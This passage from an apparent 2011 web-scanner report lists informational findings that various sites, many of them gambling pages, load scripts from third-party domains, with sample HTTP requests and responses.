19.2. http://ad.doubleclick.net/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.doubleverify.com/script145.js?agnc=741233&cmp=5384441&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=62171182&advid=2993653&sid=1037707&adid=
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

19.3. https://bingo.betsson.com/en/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://bingo.betsson.com
Path:	/en/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/bingo/en/df_BingoMasterJS_v933.js

Request

GET /en/ HTTP/1.1
Host: bingo.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.4. http://blog.postcodelottery.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.postcodelottery.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js?ver=1.3.2

Request

GET / HTTP/1.1
Host: blog.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.postcodelottery.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<met
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js?ver=1.3.2'></script>
...[SNIP]...

19.5. http://br.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://br.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ad.yieldmanager.com/pixel?id=706968&t=1

Request

GET /Home.aspx HTTP/1.1
Host: br.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.6. http://br.winnings.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://br.winnings.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.cdnfo.com/scripts/js.js
http://www.cdnfo.com/scripts/swfobject1-5.js

Request

GET / HTTP/1.1
Host: br.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.7. http://casino.bet365.com/home/en/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://casino.bet365.com
Path:	/home/en/

Issue detail

The response dynamically includes the following script from another domain:

http://download.c365download.com/fimversion.conf.php

Request

GET /home/en/ HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.8. https://casino.betsson.com/en/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://casino.betsson.com
Path:	/en/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/casino/en/df_Master_js_4114_19533.js

Request

GET /en/ HTTP/1.1
Host: casino.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 12:14:14 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 12:14:14 GMT; path=/
Set-Cookie: QuickSearchLocation=0; expires=Mon, 30-Apr-2012 12:14:14 GMT; path=/
Set-Cookie: QuickSearchLocation=0; expires=Mon, 30-Apr-2012 12:14:14 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:14:14 GMT
Connection: close
Content-Length: 161996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
<![endif]-->

<script src="https://ble.hs.llnwd.net/e1/casino/en/df_Master_js_4114_19533.js" type="text/javascript"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.9. http://creativecommons.org/licenses/by-sa/2.5/br/deed.en_US previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creativecommons.org
Path:	/licenses/by-sa/2.5/br/deed.en_US

Issue detail

The response dynamically includes the following scripts from other domains:

http://yui.yahooapis.com/2.6.0/build/connection/connection-min.js
http://yui.yahooapis.com/2.6.0/build/container/container-min.js
http://yui.yahooapis.com/2.6.0/build/json/json-min.js
http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js

Request

GET /licenses/by-sa/2.5/br/deed.en_US HTTP/1.1
Host: creativecommons.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Last-Modified: Fri, 06 May 2011 23:25:19 GMT
ETag: "4502a-5338-4a2a3cd9055c0"
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 21304
Date: Mon, 16 May 2011 12:02:07 GMT
X-Varnish: 406080049 406080013
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:cc="http://creativecommons.org/ns#"

...[SNIP]...
</script>

<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js">
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/connection/connection-min.js">
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/json/json-min.js">
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/container/container-min.js">
</script>
...[SNIP]...

19.10. http://d.tradex.openx.com/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.tradex.openx.com
Path:	/afr.php

Issue detail

The response dynamically includes the following script from another domain:

http://ad.yieldmanager.com/st?ad_type=ad&ad_size=728x90&section=1703625

Request

Response

19.11. http://da.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://da.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ad.yieldmanager.com/pixel?id=706968&t=1

Request

GET /Home.aspx HTTP/1.1
Host: da.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.12. http://da.winnings.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://da.winnings.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.cdnfo.com/scripts/js.js
http://www.cdnfo.com/scripts/swfobject1-5.js

Request

GET / HTTP/1.1
Host: da.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.13. http://de.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://de.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ad.yieldmanager.com/pixel?id=706968&t=1

Request

GET /Home.aspx HTTP/1.1
Host: de.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1tkc3d3ftxfybx55a2wzek55; path=/; HttpOnly
Set-Cookie: LanguageCode=GER; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=4AC5C3DD290CC9374CADA3E9FBEDEE3D&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:32:17 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: UniqueVisitorID=4AC5C3DD290CC9374CADA3E9FBEDEE3D; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: LanguageCode=GER; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<div id="ctl00_pnlUniqueVisit_12">

<script src="http://ad.yieldmanager.com/pixel?id=706968&t=1" type="text/javascript"></script>
...[SNIP]...

19.14. http://de.winnings.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://de.winnings.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.cdnfo.com/scripts/js.js
http://www.cdnfo.com/scripts/swfobject1-5.js

Request

GET / HTTP/1.1
Host: de.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.15. http://el.winnings.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://el.winnings.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.cdnfo.com/scripts/js.js
http://www.cdnfo.com/scripts/swfobject1-5.js

Request

GET / HTTP/1.1
Host: el.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.16. http://es.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://es.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ad.yieldmanager.com/pixel?id=706968&t=1

Request

GET /Home.aspx HTTP/1.1
Host: es.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.17. http://es.winnings.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://es.winnings.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.cdnfo.com/scripts/js.js
http://www.cdnfo.com/scripts/swfobject1-5.js

Request

GET / HTTP/1.1
Host: es.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.18. http://fi.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fi.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ad.yieldmanager.com/pixel?id=706968&t=1

Request

GET /Home.aspx HTTP/1.1
Host: fi.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.19. http://fi.winnings.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fi.winnings.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.cdnfo.com/scripts/js.js
http://www.cdnfo.com/scripts/swfobject1-5.js

Request

GET / HTTP/1.1
Host: fi.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.20. http://fr.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fr.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ad.yieldmanager.com/pixel?id=706968&t=1

Request

GET /Home.aspx HTTP/1.1
Host: fr.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.21. http://fr.winnings.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fr.winnings.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.cdnfo.com/scripts/js.js
http://www.cdnfo.com/scripts/swfobject1-5.js

Request

GET / HTTP/1.1
Host: fr.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.22. http://games.bet365.com/home/en/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://games.bet365.com
Path:	/home/en/

Issue detail

The response dynamically includes the following script from another domain:

http://downloadgames.c365download.com/fimversion.conf.php

Request

GET /home/en/ HTTP/1.1
Host: games.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.23. https://games.betsson.com/en/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://games.betsson.com
Path:	/en/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/games/en/df_GamesMasterJS_v10454.js

Request

GET /en/ HTTP/1.1
Host: games.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, post-check=15,pre-check=60, post-check=0,pre-check=0, post-check=15,pre-check=60, post-check=0,pre-check=0, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 12:34:48 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 12:34:48 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:34:48 GMT
Connection: close
Content-Length: 161353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/games/en/df_GamesMasterJS_v10454.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.24. http://getclicky.com/66384109 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://getclicky.com
Path:	/66384109

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js
http://maps.google.com/maps/api/js?v=3.3&sensor=false

Request

GET /66384109 HTTP/1.1
Host: getclicky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:45:21 GMT
Server: Apache
P3P: CP='NOI DSP COR CUR OUR NID NOR'
Set-Cookie: PHPSESSID=8adbf56b6cdc8626904763e06aeaa6ad; path=/
Cache-Control: must-revalidate, no-cache
Set-Cookie: referer=66372715; expires=Fri, 15 Jul 2011 12:45:21 GMT; path=/; domain=.getclicky.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46672

<!doctype html>
<html>
<head>
<title>Web Analytics in Real Time | Clicky</title>
<meta name="description" content="Clicky Web Analytics is simply the best way to monitor, analyze, and react to your bl
...[SNIP]...
<link href="http://static.getclicky.com/inc/style.css?2011-01-10" rel="stylesheet" type="text/css" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script>
...[SNIP]...
</script>
<script src="http://maps.google.com/maps/api/js?v=3.3&sensor=false"></script>
...[SNIP]...

19.25. http://it.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ad.yieldmanager.com/pixel?id=706968&t=1

Request

GET /Home.aspx HTTP/1.1
Host: it.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0zlhnt55momsyp55ncyjqa55; path=/; HttpOnly
Set-Cookie: LanguageCode=ITA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=E9F94BE04098FBE7F8CCB206CCDB21E5&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:02:25 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: UniqueVisitorID=E9F94BE04098FBE7F8CCB206CCDB21E5; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: LanguageCode=ITA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<div id="ctl00_pnlUniqueVisit_12">

<script src="http://ad.yieldmanager.com/pixel?id=706968&t=1" type="text/javascript"></script>
...[SNIP]...

19.26. http://itunes.apple.com/us/app/pclottery/id399201446 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://itunes.apple.com
Path:	/us/app/pclottery/id399201446

Issue detail

The response dynamically includes the following scripts from other domains:

http://r.mzstatic.com/htmlResources/5176/web-storefront-base.jsz
http://r.mzstatic.com/htmlResources/5176/web-storefront-preview.jsz

Request

GET /us/app/pclottery/id399201446 HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 16 May 2011 12:13:11 GMT
x-apple-orig-url-path: /us/app/pclottery/id399201446
x-apple-application-site: ST11
x-apple-max-age: 3600
Content-Type: text/html
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewSoftware?id=399201446&cc=us
x-apple-application-instance: 2093012
x-apple-aka-ttl: Generated Mon May 16 05:13:11 PDT 2011, Expires Mon May 16 05:14:11 PDT 2011, TTL 60s
x-webobjects-loadaverage: 0
Cache-Control: no-transform, max-age=60
Date: Mon, 16 May 2011 12:13:11 GMT
Content-Length: 23420
Connection: close
X-Apple-Partner: origin.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">

<head>

<meta http-equiv="Content-Type" conten
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://r.mzstatic.com/htmlResources/5176/web-storefront-preview.cssz" />

<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/5176/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/5176/web-storefront-preview.jsz"></script>
...[SNIP]...

19.27. http://jquery.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jquery.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET / HTTP/1.1
Host: jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 13 May 2011 14:06:28 GMT
ETag: "49602d6-41a4-cfd98100"
Accept-Ranges: bytes
Content-Length: 16804
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=utf-8" />
       <title>jQuery: The Write Less, Do More, JavaScript Library</title>
       <link rel="stylesheet" hr
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/files/rocker/css/screen.css" type="text/css" />
       <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

19.28. http://leandrovieira.com/projects/jquery/lightbox/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leandrovieira.com
Path:	/projects/jquery/lightbox/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /projects/jquery/lightbox/ HTTP/1.1
Host: leandrovieira.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:41 GMT
Server: Apache
Last-Modified: Wed, 28 Jul 2010 01:05:18 GMT
ETag: "3cac22e-4440-48c68360aaf80"
Accept-Ranges: bytes
Content-Length: 17472
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="tex
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

19.29. https://livecasino.betsson.com/en/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://livecasino.betsson.com
Path:	/en/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/livecasino/en/df_Master_js_4052_27715.js

Request

GET /en/ HTTP/1.1
Host: livecasino.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.30. http://mad4milk.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mad4milk.net
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/ga.js

Request

GET / HTTP/1.1
Host: mad4milk.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:02:27 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Set-Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%220dab13bb74e8811bc287a4f680ca7c35%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1305547348%3Bs%3A10%3A%22last_visit%22%3Bi%3A0%3B%7D; expires=Mon, 16-May-2011 14:02:28 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-e
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="/assets/styles/style.css" />

   <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

19.31. http://nl.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nl.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ad.yieldmanager.com/pixel?id=706968&t=1

Request

GET /Home.aspx HTTP/1.1
Host: nl.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.32. http://nl.winnings.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nl.winnings.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.cdnfo.com/scripts/js.js
http://www.cdnfo.com/scripts/swfobject1-5.js

Request

GET / HTTP/1.1
Host: nl.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.33. http://no.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://no.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ad.yieldmanager.com/pixel?id=706968&t=1

